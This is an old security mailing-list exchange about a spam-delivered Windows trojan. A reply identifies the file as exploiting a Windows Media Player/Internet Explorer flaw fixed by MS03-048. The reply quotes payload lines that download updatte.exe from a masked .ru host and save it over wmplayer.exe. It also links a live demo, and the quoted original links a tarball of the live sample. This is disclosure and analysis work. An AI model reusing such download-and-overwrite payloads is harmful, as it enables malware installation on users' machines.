Re: new WIN virus?

[K-OTiK Security <Special-Alerts () k-otik com>]

In-Reply-To: <Pine.BSF.4.58.0401290056100.39640 () erfrnepu fhfcvpvbhf bet>

This is a lame trojan? trying to exploit the Windows Media Player/Internet Explorer vulnerability (greetz to Liu Die Yu)

x.Open("GET", "http://www.****.ru/dan/updatte.exe",0);
[...]
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);  

Online Demo : http://www.k-otik.com/WMPLAYER-TEST/

Vulnerability fixed with MS03-048 BID (8577, 9013, 9014, 9015).

Regards.
Chaouki B. /// http://www.k-otik.com



> From: Atom 'Smasher' <atom () suspicious org>
> To: bugtraq () securityfocus com
> Subject: new WIN virus?
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> i don't know much at all about windows, but this spam got past my spam
> filter and drew my attention. i tested the suspect file in some on-line
> virus checkers, and they all reported the file as not being a threat.
> looking at the page that the spam requested (hidden after "@" in the link)
> i can only think that the file is up to no-good.
>
> the original spam, the page that it requests, and the suspicious "exe"
> file:
>       http://smasher.suspicious.org/tmp/live-virus.tgz
>
> live-virus.tgz
> md5:  42e6edfe1dcbb3e83f3da997014c7858
> sha1: 372ef9ce498b3cd23cd7c0c2b404a18f7d1b7771
>
> the TGZ contains:
> - -rw-r--r-- atom/atom      1606 Jan 29 00:34 2004 spam
> - -rw-r--r-- atom/atom      1941 Jan 29 00:31 2004 gift-with-headers.html
> - -rw-r--r-- atom/atom      8704 Jan 28 22:41 2004 updatte.exe
>
> updatte.exe was tested on:
>   yahoo-mail
>   http://www.kaspersky.com/remoteviruschk.html
>   http://www.dials.ru/english/www_av/
>   http://www.rav.ro/scan/indexn.php
> and they all reported that the file poses no threat. i suspect they're
> wrong.
>
>
>       ...atom

>